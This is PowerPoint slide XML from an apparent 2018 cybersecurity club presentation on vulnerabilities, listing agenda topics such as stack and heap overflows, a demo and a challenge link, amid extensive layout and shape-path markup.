            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>                 VULNERABILITIES</a:t>
            </a:r>
            <a:endParaRPr sz="5400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Montserrat Medium"/>
              <a:ea typeface="Montserrat Medium"/>
              <a:cs typeface="Montserrat Medium"/>
              <a:sym typeface="Montserrat Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A89775-1E72-4EF5-8AF7-48F58E2143E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10774017" y="6488668"/>
            <a:ext cx="1303562" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sofia 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B4BD5DC-1992-439B-A4D8-53B0E38473A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9842672" y="6119336"/>
            <a:ext cx="2234907" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Joachim De Zutter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300550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E5CFE0-294D-428E-B560-07D189AA02B2}"/>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F674B3F4-5133-4B77-B12D-0AA4DD75537F}"/>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048439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C42935-2A86-4CBA-A3DB-C5E8E03A99A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062787" y="700086"/>
            <a:ext cx="3952875" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="71000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614361" y="4958198"/>
            <a:ext cx="6353175" cy="1376810"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/JDeZutter/CyberSecurityClub/blob/master/letitsnow.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="419099"/>
            <a:ext cx="10287000" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Challenge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8649A44A-5474-4254-8A5A-0F6126F5AB05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058024" y="700085"/>
            <a:ext cx="3952875" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="40444A">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Online Media 6">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEFB8C2A-D9EE-4064-A196-8408FC8E3CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noRot="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <a:videoFile r:link="rId1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352672" y="1776852"/>
            <a:ext cx="3048000" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Monitor">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060D41B4-52F5-44F8-B66A-F7370CBBF5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47834" y="1190625"/>
            <a:ext cx="4257677" cy="3952875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33764412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09DCA1-78AA-4758-B406-82F10293C473}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286250" y="2539483"/>
            <a:ext cx="4114800" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32409853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96633">
            <a:alpha val="95000"/>
          </a:srgb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5441639" y="2597944"/>
            <a:ext cx="8024812" cy="507011"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5441639" y="3318095"/>
            <a:ext cx="8024812" cy="569912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508314" y="4162781"/>
            <a:ext cx="8024812" cy="514350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5441639" y="4945833"/>
            <a:ext cx="8024812" cy="492053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next topic: reverse engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4967878" y="2597944"/>
            <a:ext cx="402043" cy="402043"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 532 w 608"/>
              <a:gd name="T1" fmla="*/ 228 h 608"/>
              <a:gd name="T2" fmla="*/ 380 w 608"/>
              <a:gd name="T3" fmla="*/ 228 h 608"/>
              <a:gd name="T4" fmla="*/ 380 w 608"/>
              <a:gd name="T5" fmla="*/ 76 h 608"/>
              <a:gd name="T6" fmla="*/ 304 w 608"/>
              <a:gd name="T7" fmla="*/ 0 h 608"/>
              <a:gd name="T8" fmla="*/ 228 w 608"/>
              <a:gd name="T9" fmla="*/ 76 h 608"/>
              <a:gd name="T10" fmla="*/ 228 w 608"/>
              <a:gd name="T11" fmla="*/ 228 h 608"/>
              <a:gd name="T12" fmla="*/ 76 w 608"/>
              <a:gd name="T13" fmla="*/ 228 h 608"/>
              <a:gd name="T14" fmla="*/ 0 w 608"/>
              <a:gd name="T15" fmla="*/ 304 h 608"/>
              <a:gd name="T16" fmla="*/ 76 w 608"/>
              <a:gd name="T17" fmla="*/ 380 h 608"/>
              <a:gd name="T18" fmla="*/ 228 w 608"/>
              <a:gd name="T19" fmla="*/ 380 h 608"/>
              <a:gd name="T20" fmla="*/ 228 w 608"/>
              <a:gd name="T21" fmla="*/ 532 h 608"/>
              <a:gd name="T22" fmla="*/ 304 w 608"/>
              <a:gd name="T23" fmla="*/ 608 h 608"/>
              <a:gd name="T24" fmla="*/ 380 w 608"/>
              <a:gd name="T25" fmla="*/ 532 h 608"/>
              <a:gd name="T26" fmla="*/ 380 w 608"/>
              <a:gd name="T27" fmla="*/ 380 h 608"/>
              <a:gd name="T28" fmla="*/ 532 w 608"/>
              <a:gd name="T29" fmla="*/ 380 h 608"/>
              <a:gd name="T30" fmla="*/ 608 w 608"/>
              <a:gd name="T31" fmla="*/ 304 h 608"/>
              <a:gd name="T32" fmla="*/ 532 w 608"/>
              <a:gd name="T33" fmla="*/ 22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8" h="608">
                <a:moveTo>
                  <a:pt x="532" y="228"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="228"/>
                  <a:pt x="380" y="228"/>
                  <a:pt x="380" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="76"/>
                  <a:pt x="380" y="76"/>
                  <a:pt x="380" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="34"/>
                  <a:pt x="346" y="0"/>
                  <a:pt x="304" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="262" y="0"/>
                  <a:pt x="228" y="34"/>
                  <a:pt x="228" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="228"/>
                  <a:pt x="228" y="228"/>
                  <a:pt x="228" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="228"/>
                  <a:pt x="76" y="228"/>
                  <a:pt x="76" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="228"/>
                  <a:pt x="0" y="262"/>
                  <a:pt x="0" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="346"/>
                  <a:pt x="34" y="380"/>
                  <a:pt x="76" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="380"/>
                  <a:pt x="228" y="380"/>
                  <a:pt x="228" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="532"/>
                  <a:pt x="228" y="532"/>
                  <a:pt x="228" y="532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="574"/>
                  <a:pt x="262" y="608"/>
                  <a:pt x="304" y="608"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="608"/>
                  <a:pt x="380" y="574"/>
                  <a:pt x="380" y="532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="380"/>
                  <a:pt x="380" y="380"/>
                  <a:pt x="380" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="532" y="380"/>
                  <a:pt x="532" y="380"/>
                  <a:pt x="532" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="574" y="380"/>
                  <a:pt x="608" y="346"/>
                  <a:pt x="608" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="608" y="262"/>
                  <a:pt x="574" y="228"/>
                  <a:pt x="532" y="22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4967878" y="3402030"/>
            <a:ext cx="402043" cy="402043"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 532 w 608"/>
              <a:gd name="T1" fmla="*/ 228 h 608"/>
              <a:gd name="T2" fmla="*/ 380 w 608"/>
              <a:gd name="T3" fmla="*/ 228 h 608"/>
              <a:gd name="T4" fmla="*/ 380 w 608"/>
              <a:gd name="T5" fmla="*/ 76 h 608"/>
              <a:gd name="T6" fmla="*/ 304 w 608"/>
              <a:gd name="T7" fmla="*/ 0 h 608"/>
              <a:gd name="T8" fmla="*/ 228 w 608"/>
              <a:gd name="T9" fmla="*/ 76 h 608"/>
              <a:gd name="T10" fmla="*/ 228 w 608"/>
              <a:gd name="T11" fmla="*/ 228 h 608"/>
              <a:gd name="T12" fmla="*/ 76 w 608"/>
              <a:gd name="T13" fmla="*/ 228 h 608"/>
              <a:gd name="T14" fmla="*/ 0 w 608"/>
              <a:gd name="T15" fmla="*/ 304 h 608"/>
              <a:gd name="T16" fmla="*/ 76 w 608"/>
              <a:gd name="T17" fmla="*/ 380 h 608"/>
              <a:gd name="T18" fmla="*/ 228 w 608"/>
              <a:gd name="T19" fmla="*/ 380 h 608"/>
              <a:gd name="T20" fmla="*/ 228 w 608"/>
              <a:gd name="T21" fmla="*/ 532 h 608"/>
              <a:gd name="T22" fmla="*/ 304 w 608"/>
              <a:gd name="T23" fmla="*/ 608 h 608"/>
              <a:gd name="T24" fmla="*/ 380 w 608"/>
              <a:gd name="T25" fmla="*/ 532 h 608"/>
              <a:gd name="T26" fmla="*/ 380 w 608"/>
              <a:gd name="T27" fmla="*/ 380 h 608"/>
              <a:gd name="T28" fmla="*/ 532 w 608"/>
              <a:gd name="T29" fmla="*/ 380 h 608"/>
              <a:gd name="T30" fmla="*/ 608 w 608"/>
              <a:gd name="T31" fmla="*/ 304 h 608"/>
              <a:gd name="T32" fmla="*/ 532 w 608"/>
              <a:gd name="T33" fmla="*/ 22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8" h="608">
                <a:moveTo>
                  <a:pt x="532" y="228"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="228"/>
                  <a:pt x="380" y="228"/>
                  <a:pt x="380" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="76"/>
                  <a:pt x="380" y="76"/>
                  <a:pt x="380" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="34"/>
                  <a:pt x="346" y="0"/>
                  <a:pt x="304" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="262" y="0"/>
                  <a:pt x="228" y="34"/>
                  <a:pt x="228" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="228"/>
                  <a:pt x="228" y="228"/>
                  <a:pt x="228" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="228"/>
                  <a:pt x="76" y="228"/>
                  <a:pt x="76" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="228"/>
                  <a:pt x="0" y="262"/>
                  <a:pt x="0" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="346"/>
                  <a:pt x="34" y="380"/>
                  <a:pt x="76" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="380"/>
                  <a:pt x="228" y="380"/>
                  <a:pt x="228" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="532"/>
                  <a:pt x="228" y="532"/>
                  <a:pt x="228" y="532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="574"/>
                  <a:pt x="262" y="608"/>
                  <a:pt x="304" y="608"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="608"/>
                  <a:pt x="380" y="574"/>
                  <a:pt x="380" y="532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="380"/>
                  <a:pt x="380" y="380"/>
                  <a:pt x="380" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="532" y="380"/>
                  <a:pt x="532" y="380"/>
                  <a:pt x="532" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="574" y="380"/>
                  <a:pt x="608" y="346"/>
                  <a:pt x="608" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="608" y="262"/>
                  <a:pt x="574" y="228"/>
                  <a:pt x="532" y="22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5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4967878" y="4218935"/>
            <a:ext cx="402043" cy="402043"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 532 w 608"/>
              <a:gd name="T1" fmla="*/ 228 h 608"/>
              <a:gd name="T2" fmla="*/ 380 w 608"/>
              <a:gd name="T3" fmla="*/ 228 h 608"/>
              <a:gd name="T4" fmla="*/ 380 w 608"/>
              <a:gd name="T5" fmla="*/ 76 h 608"/>
              <a:gd name="T6" fmla="*/ 304 w 608"/>
              <a:gd name="T7" fmla="*/ 0 h 608"/>
              <a:gd name="T8" fmla="*/ 228 w 608"/>
              <a:gd name="T9" fmla="*/ 76 h 608"/>
              <a:gd name="T10" fmla="*/ 228 w 608"/>
              <a:gd name="T11" fmla="*/ 228 h 608"/>
              <a:gd name="T12" fmla="*/ 76 w 608"/>
              <a:gd name="T13" fmla="*/ 228 h 608"/>
              <a:gd name="T14" fmla="*/ 0 w 608"/>
              <a:gd name="T15" fmla="*/ 304 h 608"/>
              <a:gd name="T16" fmla="*/ 76 w 608"/>
              <a:gd name="T17" fmla="*/ 380 h 608"/>
              <a:gd name="T18" fmla="*/ 228 w 608"/>
              <a:gd name="T19" fmla="*/ 380 h 608"/>
              <a:gd name="T20" fmla="*/ 228 w 608"/>
              <a:gd name="T21" fmla="*/ 532 h 608"/>
              <a:gd name="T22" fmla="*/ 304 w 608"/>
              <a:gd name="T23" fmla="*/ 608 h 608"/>
              <a:gd name="T24" fmla="*/ 380 w 608"/>
              <a:gd name="T25" fmla="*/ 532 h 608"/>
              <a:gd name="T26" fmla="*/ 380 w 608"/>
              <a:gd name="T27" fmla="*/ 380 h 608"/>
              <a:gd name="T28" fmla="*/ 532 w 608"/>
              <a:gd name="T29" fmla="*/ 380 h 608"/>
              <a:gd name="T30" fmla="*/ 608 w 608"/>
              <a:gd name="T31" fmla="*/ 304 h 608"/>
              <a:gd name="T32" fmla="*/ 532 w 608"/>
              <a:gd name="T33" fmla="*/ 22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8" h="608">
                <a:moveTo>
                  <a:pt x="532" y="228"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="228"/>
                  <a:pt x="380" y="228"/>
                  <a:pt x="380" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="76"/>
                  <a:pt x="380" y="76"/>
                  <a:pt x="380" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="34"/>
                  <a:pt x="346" y="0"/>
                  <a:pt x="304" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="262" y="0"/>
                  <a:pt x="228" y="34"/>
                  <a:pt x="228" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="228"/>
                  <a:pt x="228" y="228"/>
                  <a:pt x="228" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="228"/>
                  <a:pt x="76" y="228"/>
                  <a:pt x="76" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="228"/>
                  <a:pt x="0" y="262"/>
                  <a:pt x="0" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="346"/>
                  <a:pt x="34" y="380"/>
                  <a:pt x="76" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="380"/>
                  <a:pt x="228" y="380"/>
                  <a:pt x="228" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="532"/>
                  <a:pt x="228" y="532"/>
                  <a:pt x="228" y="532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="574"/>
                  <a:pt x="262" y="608"/>
                  <a:pt x="304" y="608"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="608"/>
                  <a:pt x="380" y="574"/>
                  <a:pt x="380" y="532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="380"/>
                  <a:pt x="380" y="380"/>
                  <a:pt x="380" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="532" y="380"/>
                  <a:pt x="532" y="380"/>
                  <a:pt x="532" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="574" y="380"/>
                  <a:pt x="608" y="346"/>
                  <a:pt x="608" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="608" y="262"/>
                  <a:pt x="574" y="228"/>
                  <a:pt x="532" y="22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p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4967878" y="5035840"/>
            <a:ext cx="402043" cy="402043"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 532 w 608"/>
              <a:gd name="T1" fmla="*/ 228 h 608"/>
              <a:gd name="T2" fmla="*/ 380 w 608"/>
              <a:gd name="T3" fmla="*/ 228 h 608"/>
              <a:gd name="T4" fmla="*/ 380 w 608"/>
              <a:gd name="T5" fmla="*/ 76 h 608"/>
              <a:gd name="T6" fmla="*/ 304 w 608"/>
              <a:gd name="T7" fmla="*/ 0 h 608"/>
              <a:gd name="T8" fmla="*/ 228 w 608"/>
              <a:gd name="T9" fmla="*/ 76 h 608"/>
              <a:gd name="T10" fmla="*/ 228 w 608"/>
              <a:gd name="T11" fmla="*/ 228 h 608"/>
              <a:gd name="T12" fmla="*/ 76 w 608"/>
              <a:gd name="T13" fmla="*/ 228 h 608"/>
              <a:gd name="T14" fmla="*/ 0 w 608"/>
              <a:gd name="T15" fmla="*/ 304 h 608"/>
              <a:gd name="T16" fmla="*/ 76 w 608"/>
              <a:gd name="T17" fmla="*/ 380 h 608"/>
              <a:gd name="T18" fmla="*/ 228 w 608"/>
              <a:gd name="T19" fmla="*/ 380 h 608"/>
              <a:gd name="T20" fmla="*/ 228 w 608"/>
              <a:gd name="T21" fmla="*/ 532 h 608"/>
              <a:gd name="T22" fmla="*/ 304 w 608"/>
              <a:gd name="T23" fmla="*/ 608 h 608"/>
              <a:gd name="T24" fmla="*/ 380 w 608"/>
              <a:gd name="T25" fmla="*/ 532 h 608"/>
              <a:gd name="T26" fmla="*/ 380 w 608"/>
              <a:gd name="T27" fmla="*/ 380 h 608"/>
              <a:gd name="T28" fmla="*/ 532 w 608"/>
              <a:gd name="T29" fmla="*/ 380 h 608"/>
              <a:gd name="T30" fmla="*/ 608 w 608"/>
              <a:gd name="T31" fmla="*/ 304 h 608"/>
              <a:gd name="T32" fmla="*/ 532 w 608"/>
              <a:gd name="T33" fmla="*/ 22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8" h="608">
                <a:moveTo>
                  <a:pt x="532" y="228"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="228"/>
                  <a:pt x="380" y="228"/>
                  <a:pt x="380" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="76"/>
                  <a:pt x="380" y="76"/>
                  <a:pt x="380" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="34"/>
                  <a:pt x="346" y="0"/>
                  <a:pt x="304" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="262" y="0"/>
                  <a:pt x="228" y="34"/>
                  <a:pt x="228" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="228"/>
                  <a:pt x="228" y="228"/>
                  <a:pt x="228" y="228"/>
